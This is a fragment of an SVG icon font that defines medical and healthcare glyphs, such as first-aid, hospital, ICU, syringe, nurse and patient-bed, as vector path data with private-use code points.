<glyph glyph-name="first-aid" horiz-adv-x="1000" unicode="&#xec1d;" d="M872 569h-744c-36 0-65-29-65-65v-494c0-36 29-66 65-66h744c36 0 66 30 66 66v493c0 37-30 66-66 66z m-193-362h-129v-146c-16-3-33-5-50-5-16 0-33 2-50 5v146h-129c-3 16-5 33-5 49 0 17 2 34 5 51h129v145c17 3 33 5 50 5 17 0 34-2 50-5v-145h129c3-17 5-33 5-50 0-17-2-34-5-50z m-319 458c0 10 8 18 17 18h246c10 0 18-8 18-18v-44h77v79c0 31-24 56-55 56h-326c-30 0-55-25-55-56v-79h78v44z" />
<glyph glyph-name="heart-beat-alt" horiz-adv-x="1000" unicode="&#xec1e;" d="M560 17l-106 320h-104l-67 251-61-251h-70c133-198 384-414 384-414s250 216 382 414h-265l-93-320z m227 760c-86 9-228-44-252-181-25 137-167 190-252 181-105-12-243-58-208-272 7-43 29-92 61-142h66l80 328 88-328h102l87-259 74 259h293v-13c35 55 61 108 68 155 36 214-103 260-207 272z m139-440v13c-3-4-6-8-8-13h8z m-926 26v-26h152c-5 9-11 17-16 26h-136z" />
<glyph glyph-name="heart-beat" horiz-adv-x="1000" unicode="&#xec1f;" d="M740 348c-40-33-80-66-125-103-33 48-63 91-98 142-40-71-75-133-114-202-41 63-76 118-112 174-35-15-66-34-103-41-21-4-44-4-68-3 22-38 49-72 79-105 85-92 187-164 296-226 3-2 9-1 12 1 21 12 43 24 64 38 95 60 182 128 255 215 20 25 39 50 55 78-69-5-104 4-141 32z m131 302c-81 83-221 90-311 17-24-20-44-44-60-72-1 2-2 2-2 3-55 91-136 130-240 116-83-12-143-59-177-135-26-59-22-119-1-179 4-13 9-25 15-37 94-10 150 31 208 75 34-45 65-85 100-131 38 72 74 138 114 213 40-66 74-124 113-189 40 32 76 60 119 95 28-55 86-67 157-63 8 17 15 35 20 54 25 88 9 167-55 233z" />
<glyph glyph-name="heartbeat" horiz-adv-x="1000" unicode="&#xec20;" d="M918 758h-836c-45 0-82-37-82-82v-653c0-45 37-81 82-81h836c45 0 82 36 82 81v653c0 45-37 82-82 82z m17-735c0-9-8-16-17-16h-836c-9 0-17 7-17 16v653c0 9 8 17 17 17h836c9 0 17-8 17-17v-653z m-113 609h-643c-28 0-49-22-49-49v-237l110 0 46 44c5 4 12 7 18 6 7 0 13-3 18-8l20-23 23 121c2 10 11 18 22 20 10 1 21-5 25-15l29-71 28 59c4 9 14 15 24 14 10-1 19-8 22-18l44-150 16 88c2 10 10 18 20 20 10 2 20-4 25-13l43-78 27 55c4 8 13 13 22 13h159v173c0 28-22 49-49 49z m-136-354c-4-8-12-14-21-14-9 0-18 5-22 13l-32 59-22-122c-2-12-12-20-23-20 0 0-1 0-1 0-11 0-21 7-24 17l-55 189-24-51c-5-9-14-14-23-14-10 0-18 6-22 15l-19 46-18-90c-1-9-8-17-17-19-9-3-19 0-25 8l-36 41-35-32c-5-5-11-7-17-7h-120v-181c0-27 22-49 49-49h643c27 0 49 22 49 49v245h-144l-41-83z" />
<glyph glyph-name="herbal" horiz-adv-x="1000" unicode="&#xec21;" d="M878 480c26 0 47 0 68 0 11 0 24 1 24-13 0-7-9-15-16-21-6-84-28-163-74-234-36-57-82-104-139-141-9-6-22-11-33-11-150 0-300 0-449 0-10 0-20 4-28 9-128 86-199 206-212 359-1 10 0 20-13 25-4 1-7 10-6 16 1 4 7 9 11 11 6 1 13 0 20 0 115 0 231 0 347 0 141 0 282 1 422 0 14 0 24 4 33 15 39 43 78 86 118 128 1 1 2 2 2 3 15 15 33 19 41 8 12-15 4-28-6-39-35-37-71-74-110-115z m-797-58c-21-4-16-16-14-26 11-64 34-125 73-177 29-40 66-75 100-111 7-8 17-16 25-1 1 3-4 14-9 18-42 35-78 76-107 123-30 48-49 100-60 156-1 6-5 12-8 18z" />
<glyph glyph-name="hospital" horiz-adv-x="1000" unicode="&#xec22;" d="M469-7h-14c-8 0-15-6-15-14v-20c0-8 7-15 15-15h14c8 0 14 7 14 15v20c0 8-6 14-14 14z m76 0h-14c-8 0-14-6-14-14v-20c0-8 6-15 14-15h14c8 0 15 7 15 15v20c0 8-7 14-15 14z m401 849h-892c-32 0-56-26-54-58l56-868c2-32 30-58 61-58h271l-15 157c-3 31 20 57 51 57h156c31 0 54-26 51-57l-15-157h267c32 0 59 26 61 58l56 868c2 32-22 58-54 58z m-225-337c0 12 9 21 20 21h64c12 0 21-9 21-21v-89c0-12-9-21-21-21h-64c-11 0-20 9-20 21v89z m0-220c0 11 9 20 20 20h64c12 0 21-9 21-20v-90c0-11-9-21-21-21h-64c-11 0-20 10-20 21v90z m-441-325c0-12-10-21-21-21h-64c-12 0-21 9-21 21v89c0 12 9 21 21 21h64c11 0 21-9 21-21v-89z m0 235c0-11-10-21-21-21h-64c-12 0-21 10-21 21v90c0 11 9 20 21 20h64c11 0 21-9 21-20v-90z m0 221c0-12-10-21-21-21h-64c-12 0-21 9-21 21v89c0 12 9 21 21 21h64c11 0 21-9 21-21v-89z m182-221c0-11-9-21-21-21h-64c-12 0-21 10-21 21v90c0 11 9 20 21 20h64c12 0 21-9 21-20v-90z m0 221c0-12-9-21-21-21h-64c-12 0-21 9-21 21v89c0 12 9 21 21 21h64c12 0 21-9 21-21v-89z m67 242v-54c0-4-3-6-6-6h-46c-3 0-6 2-6 6v54c0 4-3 7-7 7h-54c-4 0-7 3-7 6v46c0 3 3 6 7 6h54c4 0 7 3 7 7v54c0 4 3 7 6 7h46c3 0 6-3 6-7v-54c0-4 3-7 7-7h54c4 0 7-2 7-6v-46c0-3-3-6-7-6h-54c-4 0-7-3-7-7z m115-463c0-11-9-21-21-21h-64c-12 0-21 10-21 21v90c0 11 9 20 21 20h64c12 0 21-9 21-20v-90z m0 221c0-12-9-21-21-21h-64c-12 0-21 9-21 21v89c0 12 9 21 21 21h64c12 0 21-9 21-21v-89z m182-456c0-12-9-21-20-21h-65c-11 0-20 9-20 21v89c0 12 9 21 20 21h65c11 0 20-9 20-21v-89z" />
<glyph glyph-name="icu" horiz-adv-x="1000" unicode="&#xec23;" d="M988 212h-976c-7 0-12-5-12-12v-53c0-6 5-12 12-12h391v-21h-273c-6 0-12-5-12-12v-74c0-6 6-12 12-12h740c6 0 12 6 12 12v74c0 7-6 12-12 12h-273v21h391c7 0 12 6 12 12v53c0 7-5 12-12 12z m-109 391c0-45-37-81-81-81-45 0-81 36-81 81s36 81 81 81c44 0 81-37 81-81z m-855-370h651c0 0 244 235 293 282 5 5 5 12 0 17l-25 27c-5 4-13 5-17 0l-251-241v17c0 5-3 7-6 4l-33-28c-6-5-13-8-20-8-9 0-18 4-23 11l-79 92c-11 13-9 33 4 44 5 4 12 7 20 7 9 0 17-4 23-11l53-62c3-4 9-4 12-1l43 36c3 3 6 10 6 15v70c0 5-3 8-8 6l-509-167c-5-1-9-7-9-12v-37h-125c-7 0-12-5-12-12v-37c0-6 5-12 12-12z m590 135l-61 71c-7 9-20 10-29 3-8-7-9-20-2-29l79-92c7-8 19-9 28-2l59 50v-14c0-5 3-7 6-3l142 142c3 4 2 8-3 9-7 1-20 2-44 2-31-1-50 11-59 18-4 4-9 4-13 1l-22-18c-4-3-7-9-7-14v-70l-65-55c-3-2-7-2-9 1z" />
<glyph glyph-name="injection-syringe" horiz-adv-x="1000" unicode="&#xec24;" d="M996-88l-226 203c10 13 17 28 20 42l0 2c7 87 1 93-6 99l-475 429c-14 13-35 12-48-2l-17-20-45 40 9 10c29 32 35 69 14 87-21 19-57 10-86-23l-109-121c-30-32-35-69-15-88 21-19 57-9 86 23l9 10 44-40-18-20c-12-13-11-35 3-48l475-429c21-18 101 5 102 5 13 5 27 13 39 24l225-204c6-5 15-4 20 1 5 6 4 14-1 20z m-243 251c-5-21-33-46-53-53-22-7-54-11-65-10l-467 421 18 20c12 13 11 35-3 48l-79 71-36-39c-11-13-22-18-27-19 1 5 5 16 16 29l109 121c12 12 22 17 28 19-1-6-5-17-16-29l-36-40 79-72c14-12 36-11 48 3l18 19 68-61c-1 0-2 0-2-1l-74-82c-5-5-5-14 1-19 5-5 14-4 19 1l74 82c0 0 1 1 1 2l19-17c0-1-1-1-2-2l-55-61c-5-6-5-15 1-20 5-5 14-4 19 1l56 62c0 1 0 1 1 2l19-17c-1-1-1-1-2-2l-74-82c-5-5-4-14 1-19 6-5 14-4 19 1l74 82c1 1 1 1 1 2l20-17c-1-1-2-1-2-2l-23-25c-2-1-3-2-4-3l-60-66c-7-8-8-19-2-24l227-210c0 0 1 0 1 0l42-37s34 3 59 27c29 28 25 66 25 66l-41 38c0 1 0 1 0 1l-10 8-207 192 13 15c0 1 1 1 1 2l262-237c9-25 9-37 1-69z m-95-2c4-3 4-9 1-13-2-2-5-3-7-3-2 0-4 1-6 3l-211 195c-3 4-4 10 0 13 3 4 9 4 13 1l210-196z" />
<glyph glyph-name="laboratory" horiz-adv-x="1000" unicode="&#xec25;" d="M953-46l-298 657c-3 8-6 22-6 30v61c0 8 7 17 15 21 20 12 34 34 34 59 0 38-30 68-67 68h-250c-38 0-68-30-68-68 0-23 12-43 29-55 7-5 14-15 14-23v-70c0-9-3-22-6-30l-303-650c-12-26-11-53 2-73 12-20 36-31 65-31h770c29 0 53 11 66 31 13 20 15 47 3 73z m-687 283l-154-319c-2-3-5-5-8-5-1 0-3 1-4 1-4 2-6 8-4 12l154 319c2 4 7 6 12 4 4-2 6-7 4-12z m461 49h-458c-9 0-13 7-9 14l136 294c4 8 6 21 6 30v120c0 9-5 17-10 17h-11c-12 0-21 10-21 21 0 12 9 21 21 21h250c11 0 21-9 21-21 0-11-10-21-21-21h-14c-8 0-14-7-14-17v-112c0-9 2-22 6-30l128-302c3-7-1-14-10-14z" />
<glyph glyph-name="medical-sign-alt" horiz-adv-x="1000" unicode="&#xec26;" d="M1000 717c-1-3-1-5-2-8-3-15-8-29-16-42-8-14-18-26-33-35-10-5-21-9-32-11-18-2-35 0-52 3-26 6-51 16-75 27-27 13-52 28-76 43-13 7-25 15-38 21-9 4-18 7-27 8-16 2-30-2-41-15-8-8-13-18-17-30-2-6-4-13-6-20-1-4-3-8-5-12-5-8-12-12-22-13-2 0-4 0-6 0 0 2 1 2 2 2 8 3 13 9 16 17 3 8 3 16 3 24 0 7 0 13 0 20 0 9 0 19 2 29 2 8 6 14 12 20 11 8 23 13 36 15 16 3 32 1 48-2 24-5 46-13 68-23 13-6 25-12 38-18 24-11 49-18 75-22 18-2 36-3 54-2 29 1 57 7 83 20 4 2 8 4 11 6 0-1 0-1 0-2z m-462-434c4 1 8 1 13 2 11 3 22 7 32 12 3 1 3 1 4-2 3-11 5-23 4-34-1-18-8-33-20-46-11-12-25-20-41-26-4-2-8-3-13-4-1-1-2-1-2-3 0-10-1-20-2-31 0 0 1 0 1 0 0 0 0 0 0 0 7 3 12 8 14 15 1 6-1 11-6 14-1 0-1 0-2 1 1 1 2 1 3 1 7 2 15 5 22 8 3 2 7 4 11 7 2 1 2 1 3-2 7-14 7-28-1-41-5-11-13-18-23-24-6-4-13-7-20-9-3-1-3-1-3-4 0-8 0-16-1-25 0 0 0-1 1-2 7 2 11 12 7 18-1 3-2 5-4 6-1 1-2 2-2 3 1 1 2 1 3 1 7 2 13 5 19 8 2 2 2 2 4 0 11-11 13-23 8-37-5-14-14-23-27-30-3-2-6-3-9-4-1 0-1 0-1-2 0-10-1-20-1-30 0-1 0-1 1-2 5 4 7 9 7 15s-2 12-7 16c9 3 16 6 22 12 3-5 5-10 6-16 0-9-2-18-7-26-5-8-12-15-21-22-1-1-2-2-2-4 0-5 0-10 0-15 3 1 4 3 4 5 1 4 0 7-1 9-1 2-1 2 0 3 4 2 6 5 9 8 0 0 1 0 2 0 3-4 5-8 6-13 0-7-2-14-6-20-2-4-4-7-7-10-7-8-10-17-11-27-1-11-3-23-3-35 0-2 0-4-1-5 0 2-1 5-1 7 0 14-2 28-4 42-1 10-1 20-2 30-1 6-1 13-1 19 0 1 0 1 0 2-3 0-4-2-4-4-1-3-1-5 1-7 1-2 2-4 2-6 1-10 1-20 2-30 0 0 0 0 0 0-1 0-1 1-2 2-3 5-7 11-10 16-4 7-7 15-8 23-1 6 0 12 3 17 3 4 7 7 13 8 2 1 2 1 2 3 0 11 0 21 0 31 0 1 0 2-1 2-1 0-1 0-2-1-5-6-6-12-4-20 2-4 4-8 6-11-2-2-3-2-5-2-2-1-4-2-6-3-1-1-2-1-3 0-6 6-11 13-14 22-3 13 1 25 10 35 4 5 9 9 15 12 2 1 2 2 2 4 0 8 0 16-1 25 0 0 0 0 0 1-3-2-8-7-9-11-1-3 0-5 1-7 1-3 3-5 5-6 1-1 2-2 3-2-1-1-2-1-2-2-5-3-9-6-13-9-2-2-2-2-6-1-8 5-13 13-15 22-2 14 2 25 11 35 6 6 13 10 21 14 0 0 1 0 2 0 1 1 2 2 2 3-1 10-1 20-2 30 0 2 0 3-2 2-3 0-5-1-8-3-3-2-4-5-4-9 1-6 4-11 8-14 2-2 4-3 5-4 0-1-1-1-2-2-8-3-16-8-22-14-2-1-3-1-4 0-8 6-14 13-17 23-7 18-3 34 9 49 8 11 20 17 32 22 4 1 4 1 4 5-1 16-1 33-2 49 0 3 0 3-3 3-4 0-9 0-13-2-12-3-17-13-15-25 2-13 10-22 22-26 1-1 2-1 2-1 0-1-1-1-2-2-10-5-19-11-27-20-3-2-3-3-6-1-13 7-23 17-30 31-5 10-8 20-7 32 1 5 2 10 5 15 10 18 24 31 42 39 9 4 18 7 28 7 2 0 3 1 2 4 0 14-1 29-1 44-1 12-1 25-1 37-1 5-1 5-6 5-11 0-22-1-32-4-6-2-11-5-16-9-7-7-10-16-9-26 1-13 7-23 16-30 9-8 20-13 31-16l5-1c1-1 1-1 1-1-2 0-3-1-5-1-18-5-34-15-47-29-3-3-3-3-7-1-25 15-44 35-53 63-5 15-5 31 1 46 5 14 15 25 28 34 12 7 25 12 38 15 12 3 24 4 36 3 5 0 10 1 15 1 2 0 2 0 2 2 0 14-1 29-1 43 0 8-1 16-1 25 0 2-1 4-3 5-8 6-18 11-28 14-16 5-32 7-48 5-3 0-5 0-8 0 0 0 0 0 0 0 0 0 0 1 0 1 5 9 9 19 12 28 3 7 5 14 8 20 2 4 5 8 8 11 5 5 11 8 18 9 11 1 21-1 32-5 3-1 6-3 9-4 0 3-1 6-2 9-1 5-3 9-6 13l-5 9c-5 9-6 18-3 27 0 2 1 4 2 6 1 4 1 4-2 7-7 6-13 13-17 22-17 37 6 81 47 89 34 6 67-16 73-51 5-24-3-45-22-61 0 0-1-1-1-1-1-1-1-1-1-2 2-3 3-6 4-9 2-10 1-18-3-27-3-3-5-7-7-11-4-6-6-12-7-18 0-1 0-1 0-2 0 0 0 0 0 0 2 0 3 1 4 1 9 4 18 7 28 8 6 0 12 0 17-2 4-2 8-4 11-8 3-3 6-7 8-12 3-8 6-16 9-24 3-8 6-15 10-22 0 0 0-1 0-1-3 0-6 0-9 0-24 2-47-2-68-14-3-2-5-4-7-5-2-2-3-3-3-5 0-12-1-23-1-35 0-10-1-21-1-32 0 0 0-1 0-1 0-2 1-2 2-2 7 0 13-1 20-1 12 0 25 0 38 1s26 3 38 7c3 1 6 3 9 4 1 1 3 2 4 3 7 5 10 11 9 18-2 9-8 15-17 17-6 1-13 0-19-1-11-1-21-3-32-4-10-1-20-1-30 3-1 0-2 0-2 1 0 2 1 2 2 3 2 1 4 1 6 1 4 0 7 0 11 0 3 0 5 0 8 0 1 0 3 0 3 1 0 2-2 2-3 3-3 0-6 1-10 1-3 0-6 0-10 1-1 0-3 1-5 2 1 1 2 2 3 3 7 4 14 7 21 8 13 3 26 4 39 2 13-1 26-3 38-9 7-2 13-6 19-10 19-14 20-36 13-52-4-8-10-15-17-21-7-6-14-10-22-14-5-2-10-3-15-4-29-6-57-9-86-8-5 0-9 0-13 1-3 0-3 0-3-3-1-12-1-25-1-38-1-15-1-30-2-45 0-3 0-3 3-3 13 3 26 7 38 14 6 3 12 8 16 14 7 9 9 18 8 29-1 11-7 19-16 24l-4 2c0 0 0 0 0 0 1 1 1 1 2 1 23 0 45 4 67 10 2 1 3 1 3-1 6-9 9-18 10-28 2-18-3-35-12-50-11-20-26-36-47-46-15-7-31-12-47-15-7-1-13-2-20-2-3 0-3 0-3-3 0-16-1-33-1-49 0-1 0-1 0-2 0-1 0-1 1-1 3 0 5 0 8 1 14 5 22 14 24 29 1 8-2 15-9 20-1 1-2 1-2 2z m-538 435c1 0 2 0 3-1 21-11 45-19 69-22 20-3 40-3 61-2 34 4 66 13 97 28 20 9 41 19 63 27 14 5 28 9 43 11 15 3 30 3 45 1 11-3 21-7 30-14 9-7 13-15 15-26 2-11 1-21 1-32 0-6 0-13 0-19 1-5 1-11 3-16 3-8 8-15 17-18 0 0 1 0 1-1-9-3-20 2-26 9-2 4-4 8-6 12-2 7-4 14-6 20-3 10-7 20-14 28-6 9-14 16-25 19-9 2-18 2-27 0-10-3-20-7-30-12-12-6-23-13-35-20-24-15-48-29-74-41-21-10-42-18-64-23-14-4-29-6-43-6-18 1-35 4-50 14-14 9-24 21-31 35-9 15-14 32-17 49 0 0 0 0 0 0z m609-21c0 0 0 0 0 0 9 13 20 20 36 19 9-1 18-4 26-7 11-5 22-11 32-17 22-14 44-27 66-39 23-12 47-22 72-30 14-4 27-8 41-9 15-2 31-2 46 2 1 0 1 0 1 0 1 0 1 0 1 0 0-3-1-5-3-8-5-14-15-25-28-33-13-8-27-13-43-16-8-2-16-3-24-3-12 1-23 4-34 8-15 6-29 15-42 25-11 9-22 20-32 30-14 13-27 27-41 39-11 11-23 21-37 28-11 6-23 9-36 10-1 0-1 0-1 1z m-539-81c4 0 8-1 12-2 10-2 21-2 32-1 28 3 55 12 81 23 27 12 53 26 78 41 12 7 23 14 34 21 11 6 22 12 35 15 6 2 13 3 20 3 9-1 16-4 23-11 2-2 5-5 7-9-2 0-4 0-6 0-13-2-26-6-38-13-12-8-24-18-35-28-12-11-24-23-36-35-11-11-22-22-35-32-10-8-21-16-34-21-16-8-32-12-50-10-22 2-42 8-60 21-13 8-22 20-27 34 0 1-1 3-1 4z m523 43c3 10 6 19 9 27 1 2 2 3 5 3 12 0 24-4 35-10 12-6 22-13 32-22 10-9 20-18 29-28 15-15 30-30 46-43 14-12 30-22 47-29 13-5 27-8 42-8 3 0 7 1 10 1 1 0 1 0 2 0 0 0 0-1 0-1-7-10-16-19-26-26-9-5-18-9-28-8-8 0-15 2-21 5-12 6-21 13-31 21-14 12-27 26-40 40-13 15-27 29-42 43-10 8-20 16-32 23-9 5-19 10-30 11-1 1-2 1-3 1-1 0-2 0-4 0z m-443-109c2 0 4 0 5 0 18-2 35 1 52 8 15 6 29 16 43 26 15 13 29 27 43 41 13 13 25 26 39 37 10 8 21 15 32 21 10 4 20 6 30 6 2 0 3-1 4-3 3-8 6-16 8-25 1-2 1-2-2-2-7-1-14-3-21-6-13-5-24-12-34-21-15-11-28-25-41-39-14-14-27-28-40-41-10-9-20-19-32-26-7-4-15-8-23-10-12-2-23-1-33 5-9 5-16 12-23 19-2 3-5 6-7 10z m269 85c-4 0-7 0-10-1-12-3-21-9-29-17-8-7-14-16-20-24-7-11-14-23-21-34-5-9-11-18-17-26-4-5-9-9-13-13-13-10-26-13-41-8-7 2-17 7-22 11-1 1 0 1 0 1 15 11 28 23 40 36 16 16 30 33 47 48 10 11 21 20 34 29 10 6 21 11 32 14 3 0 6 1 9 1 1 0 2 0 2-2 2-5 5-10 9-15z m336-111c-1-1-1-1-1-1-8-6-17-11-27-13-12-2-22 0-31 7-6 4-12 9-16 15-7 8-13 18-19 27-7 12-14 24-22 35-6 9-13 18-21 26-9 7-18 12-30 14-2 1-4 1-7 2 3 3 5 6 7 9 0 1 1 3 2 5 0 2 2 2 3 2 6-1 12-2 17-4 12-4 23-11 33-18 13-10 24-21 35-32 13-13 25-27 38-40 12-12 24-24 38-34 0 0 1 0 1 0z m-300 3c-3-2-6-2-9-2-4-1-8-1-13-2-1 0-3 0-5-1 0 0-1-1-1-1 1-1 1-1 1-2 2 0 3 0 4 0 5 0 9 0 13 0 3 1 5 1 8 0 1-1 3-1 4-2 1-1 1-2-1-3-4-1-7-2-11-3-9-1-18-1-27 1-10 1-20 3-30 4-6 0-11 1-17-1-9-3-16-14-13-23 1-4 3-7 6-10 4-3 9-5 14-7 9-3 18-5 28-6 4-1 9-1 14-2 0 0 1 0 2 0-2-1-5-2-7-2-12-3-23-8-33-14-7-5-13-10-17-16-1-1-2-1-3-1-13 6-24 13-32 24-6 7-10 15-11 24-2 13 1 25 11 35 7 7 16 11 25 15 12 5 24 7 37 8 13 2 26 1 39-2 8-1 15-4 22-9 0 0 1-1 1-1 0 0 1 0 1-1z m-45 99c-9-10-13-23-17-36-3-7-6-14-9-21-2-4-5-8-8-11-6-6-13-8-21-7-3 0-7 1-10 2-1 1 0 1 0 1 8 13 15 26 24 38 5 8 11 16 19 22 6 6 13 10 21 12 0 0 1 0 1 0z m180 0c6-1 11-3 15-6 9-6 16-14 22-22 7-9 13-19 20-29 3-5 6-10 9-16-1-1-2-1-2-1-5-1-10-2-15-1-7 0-13 4-17 10-4 4-6 9-8 14-4 8-7 16-10 25-2 6-5 13-9 19-1 2-3 5-5 7z" />
<glyph glyph-name="medical-sign" horiz-adv-x="1000" unicode="&#xec27;" d="M934 818h-868c-36 0-66-29-66-66v-805c0-36 30-66 66-66h868c37 0 66 30 66 66v805c0 37-29 66-66 66z m-107-545c0-13-9-22-22-22h-184c-12 0-22-10-22-22v-184c0-13-10-22-22-22h-154c-12 0-22 9-22 22v184c0 12-10 22-22 22h-184c-12 0-22 9-22 22v154c0 12 10 22 22 22h184c12 0 22 10 22 22v184c0 12 10 22 22 22h154c12 0 22-10 22-22v-184c0-12 10-22 22-22h184c13 0 22-10 22-22v-154z" />
<glyph glyph-name="nurse-alt" horiz-adv-x="1000" unicode="&#xec28;" d="M477 850h31c4-2 8-6 12-7 74-18 148-37 222-53 21-4 28-13 25-34-5-34-8-69-13-104-10-66-22-131 9-197 20-41 28-88 44-132 8-21 4-31-18-36-37-9-75-19-112-28-22-5-44-10-45-40 0-37-10-85 27-102 43-20 80-51 126-65 45-13 88-31 132-46 40-13 63-38 60-83-2-25 2-49 7-73h-968c5 25 9 51 7 77-3 40 18 64 53 77 79 29 159 52 232 97 49 30 66 50 61 112-2 24-12 38-36 43-35 8-71 17-106 24-33 7-46 21-30 57 26 58 48 119 45 183-3 72-12 145-27 216-8 41 6 52 41 59 74 17 149 30 221 55z m12-289c65 0 130 0 195 0 18-1 27 3 29 24 5 49 13 97 21 146 4 22-4 31-27 35-63 13-126 30-188 45-19 5-37 5-57 0-62-16-125-31-188-45-22-4-30-9-26-34 9-47 13-95 18-143 2-22 13-29 36-29 62 2 124 1 187 1z m80 130c3-18 0-31-21-28-24 3-37-4-33-31 3-18-8-22-23-21-15 0-28 2-25 20 2 26-9 35-34 32-19-3-20 10-20 24 1 13-1 28 19 27 23-2 38 4 34 32-2 19 12 19 26 19 15 0 26-2 23-21-3-24 7-33 31-30 17 1 28-5 23-23z" />
<glyph glyph-name="nurse" horiz-adv-x="1000" unicode="&#xec29;" d="M326 571c6-14 14-26 16-40 8-40 26-75 53-105 17-18 16-38 10-57-5-17-3-29 8-42 15-17 29-34 50-45 24-13 57-10 84 11 21 17 38 39 53 62 3 4 2 7 1 11-1 5-2 9-3 14-4 19 1 34 14 49 26 29 43 64 51 103 3 14 11 25 18 38 0-5 0-10 0-15-8-49-2-98 7-147 3-19 10-39 18-58 5-11 16-11 24-14 32-13 62-27 90-44 26-16 39-40 49-68 14-42 27-85 35-130 10-48 13-97 10-147-1-21-14-34-33-41-42-16-87-28-132-38-26-5-53-9-79-14-20-4-40-4-60-4-52 0-105 1-157 0-50-1-100 4-149 13-52 10-102 21-151 38-14 4-28 9-41 15-21 9-24 28-26 47-2 29 3 58 6 87 4 39 11 77 21 115 9 36 20 71 39 103 16 25 41 38 69 48 22 9 45 17 68 25 5 2 9 5 11 11 14 35 21 71 25 108 3 33 4 65-1 97 0 4-1 9 2 14z m147-578c0-9 0-17 0-25s1-10 10-10c12 0 24 0 36 0 8 0 10 3 10 11-1 14 0 28-1 43 0 8 3 12 12 12 14-1 29 0 43-1 8 0 11 3 11 11 0 12-1 24 0 36 0 8-4 10-11 10-14 0-27 0-41 0-10-1-14 3-14 14 1 14 0 28 1 42 0 6-2 9-9 9-13 0-25 0-38 0-7 0-10-2-10-10 1-14 0-29 1-43 0-9-4-12-12-12-11 0-21 0-31 0-23-1-23-1-23-23 0-33 0-33 33-34 11 0 24 5 30-2 7-6 2-19 3-28z m-105 624c-14 0-27 0-41-1-9 0-13 4-13 13-1 23-2 47 1 69 7 55 36 116 108 138 32 10 65 17 98 13 63-8 118-31 148-91 20-38 20-81 18-123 0-4 1-8-6-6-6 1-7-7-8-11-1-6-3-7-9-4-28 14-46 37-57 65-3 7-4 9-12 3-49-34-105-54-165-62-21-3-41-4-62-3z" />
<glyph glyph-name="nursing-home" horiz-adv-x="1000" unicode="&#xec2a;" d="M834 126c-62 8-123 20-185 23-82 5-164 8-245 4-80-5-159-20-239-30-4 0-12 4-14 8-51 88-101 176-150 265-3 6 2 20 7 25 23 18 47 36 72 50 80 44 166 75 255 93 169 33 333 15 491-50 50-21 97-51 145-77 8-4 14-11 20-16 11-9 11-18 5-30-50-86-98-172-148-258-2-5-8-8-12-13-1 2-1 4-2 6z m-294 387h-83v-96c-29 0-55 1-82 0-5 0-14-6-14-9-1-24-1-48-1-74h98v-96h81c0 3 1 5 1 6 0 19 0 38 0 57 0 34 0 34 35 34h62v83h-97v95z m-359-359c-3 6-4 10-7 15-28 53-57 106-86 159-14 26-29 51-45 76-2 3-9 3-13 5-2-5-4-10-4-16 0-2 3-5 4-8 28-49 55-98 83-147 15-28 30-57 46-85 2-4 9-7 14-8 2 0 5 6 8 9z" />
<glyph glyph-name="operation-theater" horiz-adv-x="1000" unicode="&#xec2b;" d="M698 331c0-27 22-49 49-49 28 0 50 22 50 49 0 27-22 50-50 50s-49-23-49-50z m-35 16c-9 0-16-7-16-16v-96c0-8 7-16 15-16h117c9 0 16 7 16 16 0 9-7 17-16 17h-95c-3 0-6 2-6 5v74c0 9-6 16-15 16z m-439-122h398c6 0 10 5 10 10v76c0 6-4 12-10 12h-356c-29 0-53-23-53-50v-38c0-5 5-10 11-10z m358 321c63-43 126-58 142-35 16 23-22 76-85 119-63 42-126 58-142 35-16-23 22-77 85-119z m38 6c-4-5-18-2-31 8-14 9-22 20-19 25s18 2 31-7c14-9 22-21 19-26z m73-22c-4-5-18-2-31 7-14 10-22 21-19 26 4 5 17 2 31-7 14-10 22-21 19-26z m-93 94c3 5 17 1 30-8 14-9 22-21 19-26-3-5-17-1-31 8-14 9-22 21-18 26z m-74 23c4 5 18 2 31-7 14-10 22-21 19-26s-18-2-31 7c-14 10-22 21-19 26z m215-111c8 13 8 29-1 42-13 17-34 42-66 66l52 66c2 3 4 7 4 11v111c0 10-8 18-18 18-10 0-18-8-18-18v-105l-50-64s-42 28-94 38c-12 2-24-2-31-12l0 0s60-4 128-52c74-52 94-101 94-101z m128-331h-738c0-47 38-85 85-85h239s0 0 0 0v-94c-8-1-14-8-14-18v-61c0-9 6-17 14-17v-65c0-8 7-15 16-15h58c9 0 16 7 16 15v255h239c47 0 85 38 85 85z" />
<glyph glyph-name="paralysis-disability" horiz-adv-x="1000" unicode="&#xec2c;" d="M458 767c0-46-37-84-83-84s-84 38-84 84 38 83 84 83 83-37 83-83z m254-683c-16 8-35 1-43-15-45-94-141-154-244-154-150 0-271 121-271 271 0 84 38 163 106 215 14 11 16 31 6 45-11 14-32 17-46 6-83-64-131-161-131-266 0-185 151-336 336-336 128 0 247 75 302 191 8 16 1 35-15 43z m194-25l-173 279c-9 13-25 16-43 16h-218c-9 0-17 1-17 2l1 2v35c0 9 1 16 3 16 1 0 2 0 3 0h191c22 0 39 17 39 39 0 21-17 39-39 39h-191c-1 0-2 0-3 0-2-1-3 6-3 15v91c0 35-29 63-63 63h-18c-34 0-62-28-62-63v-315c0-35 28-63 62-63h301c9 0 20-6 25-13 30-46 127-192 127-192 11-19 39-23 60-9 22 13 30 39 18 58z" />
<glyph glyph-name="patient-bed" horiz-adv-x="1000" unicode="&#xec2d;" d="M933 551l-387 285c-25 19-66 19-91 0l-387-285c-23-17-40-50-40-79v-557c0-36 29-65 65-65h814c37 0 66 29 66 65v557c0 29-17 62-40 79z m-840-636v557c0 8 7 22 13 26l387 286c1 0 4 1 7 1s6-1 7-1l387-286c7-4 13-18 13-26l0-557h-814z m279 552h86c5 0 10-4 10-10v-85c0-6 5-11 10-11h72c5 0 10 5 10 11v85c0 6 5 10 10 10h86c5 0 10 5 10 11v71c0 6-5 10-10 10h-86c-5 0-10 5-10 10v86c0 6-5 10-10 10h-72c-5 0-10-4-10-10v-85c0-6-5-11-10-11h-86c-5 0-10-4-10-10v-71c0-6 5-11 10-11z m446-208c-13 0-23-9-25-21 0 0 0-4 0-4v-121h-35v14c0 8-15 15-33 15h-433l-2 1c-15 19-38 30-60 30v141c0 18-15 33-33 33-18 0-33-15-33-33v-346c0-18 15-32 33-32s33 14 33 32v93h34v-19c0-10 13-26 30-30 76-20 220-8 264 12 36 15 121 9 167 4 18-2 33 4 33 14v19h35v-93c0-13 11-24 25-24 13 0 24 11 24 24v266s0 4 0 4c-2 12-12 21-24 21z" />
